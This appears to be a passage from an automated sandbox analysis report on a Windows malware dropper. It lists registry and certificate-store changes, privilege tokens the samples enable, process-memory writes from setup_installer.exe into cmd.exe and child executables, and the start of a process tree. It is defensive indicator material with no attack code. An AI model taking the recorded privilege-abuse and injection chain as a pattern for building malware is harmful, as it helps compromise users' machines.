sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe -
Modifies registry class 2 IoCs
Processes:
1937106983.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings 1937106983.exe -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeWerFault.exeWerFault.exeWerFault.exe7559937.scrWerFault.exe5699436.exe7916863.scrWerFault.exeWerFault.exe2177726.exeWerFault.exeSun1917b8fb5f09db8.exepid process 4708 powershell.exe 4708 powershell.exe 5708 WerFault.exe 5708 WerFault.exe 5724 WerFault.exe 5724 WerFault.exe 5680 WerFault.exe 5680 WerFault.exe 4708 powershell.exe 4708 powershell.exe 5596 7559937.scr 5596 7559937.scr 5336 WerFault.exe 5336 WerFault.exe 5924 5699436.exe 5924 5699436.exe 5536 7916863.scr 5536 7916863.scr 6036 WerFault.exe 6036 WerFault.exe 2208 WerFault.exe 2208 WerFault.exe 1720 2177726.exe 1720 2177726.exe 1636 WerFault.exe 1636 WerFault.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe 1652 Sun1917b8fb5f09db8.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3232 -
Suspicious behavior: MapViewOfSection 9 IoCs
Processes:
xdGrLjNVj4ogeSARaXCe282q.exeLK2tJGajftEeLSBc6rXxeDhR.exe1195.exepid process 11832 xdGrLjNVj4ogeSARaXCe282q.exe 7508 LK2tJGajftEeLSBc6rXxeDhR.exe 3232 3232 3232 3232 8308 1195.exe 3232 3232 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sun19262b9e49ad.exeLivelyScreenRecF18.exeSun19e4ade31b2a.exepowershell.exeSun195a1614ec24e6a.exeSun198361825f4.exeWerFault.exePublicDwlBrowser1100.exe2.exe7916863.scr5.exeSoqemaeroci.exeBearVpn 3.exe5699436.exe6273333.exe2919824.scrConhost.execmd.exe7559937.scrChrome 5.execmd.exe2177726.exe6273333.exedescription pid process Token: SeCreateTokenPrivilege 5008 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 5008 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 5008 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 5008 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 5008 Sun19262b9e49ad.exe Token: SeTcbPrivilege 5008 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 5008 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 5008 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 5008 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 5008 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 5008 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 5008 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 5008 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 5008 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 5008 Sun19262b9e49ad.exe Token: SeBackupPrivilege 5008 Sun19262b9e49ad.exe Token: SeRestorePrivilege 5008 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 5008 Sun19262b9e49ad.exe Token: SeDebugPrivilege 5008 Sun19262b9e49ad.exe Token: SeAuditPrivilege 5008 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 5008 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 5008 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 5008 Sun19262b9e49ad.exe Token: SeUndockPrivilege 5008 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 5008 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 5008 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 5008 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 5008 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 5008 Sun19262b9e49ad.exe Token: 31 5008 Sun19262b9e49ad.exe Token: 32 5008 Sun19262b9e49ad.exe Token: 33 5008 Sun19262b9e49ad.exe Token: 34 5008 Sun19262b9e49ad.exe Token: 35 5008 Sun19262b9e49ad.exe Token: SeDebugPrivilege 4808 LivelyScreenRecF18.exe Token: SeDebugPrivilege 5084 Sun19e4ade31b2a.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 4600 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 1644 Sun198361825f4.exe Token: SeRestorePrivilege 5724 WerFault.exe Token: SeBackupPrivilege 5724 WerFault.exe Token: SeBackupPrivilege 5724 WerFault.exe Token: SeDebugPrivilege 5836 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 5960 2.exe Token: SeDebugPrivilege 5536 7916863.scr Token: SeDebugPrivilege 5472 5.exe Token: SeDebugPrivilege 2828 Soqemaeroci.exe Token: SeDebugPrivilege 4808 LivelyScreenRecF18.exe Token: SeDebugPrivilege 3248 BearVpn 3.exe Token: SeDebugPrivilege 5924 5699436.exe Token: SeDebugPrivilege 2568 6273333.exe Token: SeDebugPrivilege 4928 2919824.scr Token: SeDebugPrivilege 5456 Conhost.exe Token: SeDebugPrivilege 5644 cmd.exe Token: SeDebugPrivilege 5304 Token: SeDebugPrivilege 5596 7559937.scr Token: SeDebugPrivilege 5752 Chrome 5.exe Token: SeDebugPrivilege 2996 cmd.exe Token: SeDebugPrivilege 1720 2177726.exe Token: SeDebugPrivilege 1556 6273333.exe Token: SeIncreaseQuotaPrivilege 4708 powershell.exe Token: SeSecurityPrivilege 4708 powershell.exe Token: SeTakeOwnershipPrivilege 4708 powershell.exe Token: SeLoadDriverPrivilege 4708 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
ultramediaburner.tmpinstaller.exemsedge.exepid process 6128 ultramediaburner.tmp 5220 installer.exe 9052 msedge.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3232 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4148 wrote to memory of 3068 4148 setup_x86_x64_install.exe setup_installer.exe PID 4148 wrote to memory of 3068 4148 setup_x86_x64_install.exe setup_installer.exe PID 4148 wrote to memory of 3068 4148 setup_x86_x64_install.exe setup_installer.exe PID 3068 wrote to memory of 3732 3068 setup_installer.exe setup_install.exe PID 3068 wrote to memory of 3732 3068 setup_installer.exe setup_install.exe PID 3068 wrote to memory of 3732 3068 setup_installer.exe setup_install.exe PID 3732 wrote to memory of 4432 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 4432 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 4432 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 4288 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 4288 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 4288 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 660 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 660 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 660 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3800 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3800 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3800 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 5028 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 5028 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 5028 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 2156 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 2156 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 2156 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1060 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1060 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1060 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1716 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1716 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1716 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3220 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3220 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3220 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3652 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3652 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3652 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1272 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1272 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 1272 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3372 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3372 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 3372 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 4108 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 4108 3732 setup_install.exe cmd.exe PID 3732 wrote to memory of 4108 3732 setup_install.exe cmd.exe PID 5028 wrote to memory of 5084 5028 cmd.exe Sun19e4ade31b2a.exe PID 5028 wrote to memory of 5084 5028 cmd.exe Sun19e4ade31b2a.exe PID 4432 wrote to memory of 4708 4432 cmd.exe powershell.exe PID 4432 wrote to memory of 4708 4432 cmd.exe powershell.exe PID 4432 wrote to memory of 4708 4432 cmd.exe powershell.exe PID 2156 wrote to memory of 4792 2156 cmd.exe Sun1908b94df837b3158.exe PID 2156 wrote to memory of 4792 2156 cmd.exe Sun1908b94df837b3158.exe PID 2156 wrote to memory of 4792 2156 cmd.exe Sun1908b94df837b3158.exe PID 4288 wrote to memory of 1652 4288 cmd.exe Sun1917b8fb5f09db8.exe PID 4288 wrote to memory of 1652 4288 cmd.exe Sun1917b8fb5f09db8.exe PID 4288 wrote to memory of 1652 4288 cmd.exe Sun1917b8fb5f09db8.exe PID 1060 wrote to memory of 4888 1060 cmd.exe Sun19de8ff4b6aefeb8.exe PID 1060 wrote to memory of 4888 1060 cmd.exe Sun19de8ff4b6aefeb8.exe PID 1060 wrote to memory of 4888 1060 cmd.exe Sun19de8ff4b6aefeb8.exe PID 1716 wrote to memory of 4808 1716 cmd.exe Sun191101c1aaa.exe PID 1716 wrote to memory of 4808 1716 cmd.exe Sun191101c1aaa.exe PID 3800 wrote to memory of 3924 3800 cmd.exe Sun193fda712d9f1.exe PID 3800 wrote to memory of 3924 3800 cmd.exe Sun193fda712d9f1.exe PID 660 wrote to memory of 5008 660 cmd.exe Sun19262b9e49ad.exe
Processes
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
